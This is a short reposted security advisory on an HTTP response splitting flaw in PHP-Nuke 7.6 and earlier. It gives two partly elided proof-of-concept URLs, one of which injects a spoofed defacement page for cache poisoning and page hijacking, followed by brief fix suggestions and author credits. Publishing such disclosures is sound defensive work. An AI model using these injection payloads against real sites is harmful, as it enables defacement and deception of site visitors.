[转载]PHP-NUKE <=7.6 Http Response Splitting Vuln.

  信息来源：irc.areaunix.com

http://localhost/modules.php?nam ... d%0a%3Chtml%3EHELLO I AM VULNERABLE TO HTTP RESPONSE SPLITTING%3C/html%3E&voteID=1&voteID=2&voteID=3&voteID=4&voteID=5


A more serious version involving Cross user defacement, cache poisoning and page hijacking can be,


http://localhost/modules.php?nam ... 3E<title>This is a spoofed site </title> <body bgcolor=black><font size=10 color=blue> Welcome to my PHP Nuke Website, This is a spoofed page that you are seeing and can be used for great evils details about which can be read in http://www.digitalparadox.org/papers.ah Http Response Splitting by Diabolic Crab. </center> Feel free to contact me about this vulnerablitiy at dcrab {at} hackerscenter [dot] com<font color=black>%3C/html%3E&voteID=1&voteID=2&voteID=3&voteID=4&voteID=5



Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), mysql_real_escape_string() and other functions for input validation before passing user input to the mysql database, or before echoing data on the screen, would solve these problems.


Author:
These vulnerabilties have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding with php.
_________________
AreaUnix
Security Research & Shell Reviews

http://www.areaunix.com

irc.areaunix.com